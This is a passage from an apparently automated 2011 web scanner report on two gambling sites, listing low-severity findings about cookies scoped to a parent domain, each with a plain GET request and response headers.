Set-Cookie: UniqueVisitorID=65E5179F214E218C7690B36C8457FF60; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Vary: Accept-Encoding
Content-Length: 37105


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.146. http://www.mundirasca.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.147. http://www.mundirasca.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:48 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.148. http://www.mundirasca.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:46 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.149. http://www.mundirasca.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:55 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.150. http://www.mundirasca.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:54 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36009


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.151. http://www.mundirasca.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:32:53 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 104767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.152. http://www.mundirasca.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:06 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35543


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.153. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /click/MundiRasca.com/SPA/Home/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/MundiRasca.com/SPA/Home/ HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.154. http://www.pclscratch.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=21zqne55winufojltrq5mhau; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=D7055B8BAFCDE05E5E8BAE8EAA5B2A9D&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:28 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: UniqueVisitorID=D7055B8BAFCDE05E5E8BAE8EAA5B2A9D; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:28 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37028


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.155. http://www.pclscratch.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /FairPlay.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ytdn42ugius2ml55n3ca0455; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=C548B75C9F7390F385377C4ED8CF162F&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:27 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: UniqueVisitorID=C548B75C9F7390F385377C4ED8CF162F; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.156. http://www.pclscratch.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /Promotions.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wjkur145mkgzhfqat41wv5ic; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=46A3A7DF4BF4F50E90C45E692E9AAA6F&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:02:49 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: UniqueVisitorID=46A3A7DF4BF4F50E90C45E692E9AAA6F; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32590


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.157. http://www.pclscratch.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /Responsible.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5lxnekmaeiw34y45mrj1pc45; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=D72E0122F49CBF97115FA2773E7773A1&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:22 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: UniqueVisitorID=D72E0122F49CBF97115FA2773E7773A1; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36147


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.158. http://www.pclscratch.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:03:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=iuwhs3rkmog2nqfbfnefuyv5; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=1DC262F52B431C9D115D25E0547C20DB&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:15 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: UniqueVisitorID=1DC262F52B431C9D115D25E0547C20DB; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 29565


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.159. http://www.pclscratch.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pclscratch.com
Path:   /Terms.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
